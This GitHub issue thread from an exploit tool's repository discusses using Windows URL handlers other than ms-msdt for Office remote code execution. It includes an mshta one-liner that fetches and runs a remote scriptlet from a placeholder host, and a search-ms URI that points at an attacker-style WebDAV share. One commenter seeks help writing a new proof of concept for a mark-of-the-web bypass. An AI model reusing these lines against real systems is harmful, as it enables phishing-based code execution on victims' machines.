### ISSUE TITLE
Msdt alternative 

### ISSUE THREAD

**Issue by SantaLaMuerte** [chvancooten/follina.py#34]
@chvancooten thanks for your follina script ! 

what if use not msdt , can Ms word spawn something another Url handlers that can execute pwsh ? 

Here is a bit of em what have bypass and execute options
Here is mshta   nandisec/mshta@909383b  here is a list of https://lolbas-project.github.io/#

Like a mshta.exe vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) - something like that

**Comment by SantaLaMuerte** [comment]
![IMG_20230501_052512.jpg](https://user-images.githubusercontent.com/63853227/235387767-acdd57ed-ddab-487b-95f9-ec1ec6107ab5.jpg)

Seems it's possible. 

And one question, should I always host and html payload for hooking msdt , or if I choose -c it will be inside doc with my command?
https://github.com/j00sean/CVE-2022-44666 some of search-ms using

**Comment by chvancooten** [comment]
Hi, thanks for your suggestion! As far as I'm aware, most protocol handlers that have an abuse case with public CVE have been patched one way or another. However, I'm sure there are plenty more abusable protocols to be discovered in the depths of Microsoft's products :). This project could be used as a boilerplate for that. Feel free to submit PRs or fork if you find anything interesting!

W.r.t. your other question: The remote doc is required for the command execution for this specific CVE.

**Comment by hastalamuerte** [comment]
search:query=New_Agreement.pdf&crumb=location:\84.32.189.74@80\underwall\society&displayname=Downloads

Here is an example of using and abusing Ms search . I was assumed when follina reveal that another handlers will be abused. Btw there is much more of em..

And some more info .
https://thehackernews.com/2024/02/darkme-malware-targets-traders-using.html?m=1
https://www.trendmicro.com/it_it/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html

It's not a doc , but think there is a some way to use it in rels.  With altchunk or some other new tricks

**Comment by chvancooten** [comment]
Hi @hastalamuerte, IMO this is quite a different type of protocol handler, and not related to the Follina exploit as it stands. If you would like to see it integrated in the tool I'm open to suggestions, but due to the user interaction I'm not sure how it would fit to be honest.

**Comment by hastalamuerte** [comment]
> Hi @hastalamuerte, IMO this is quite a different type of protocol handler, and not related to the Follina exploit as it stands. If you would like to see it integrated in the tool I'm open to suggestions, but due to the user interaction I'm not sure how it would fit to be honest.

Yep you right, its kind of another one. https://twitter.com/wdormann/status/1757469695651836222?t=ZivkC46fpLGi9kzPW_HyUg&s=19 here is some info about that latest handler sploit . 

I thinks there is a possibility to create another poc for cve2024-21351(21412). 
I am bad in code, so looking for help here. 
Maybe there is a way to use a ms-search in doc,docx instead of ms-msdt to get -->
That new url Wich lead to url and etc.. to get motw bypass and successfuly rce. 

![water-hydra-chain-2.jpg](https://github.com/chvancooten/follina.py/assets/63853227/5800730c-9477-40ca-b6a0-477f948620b2)
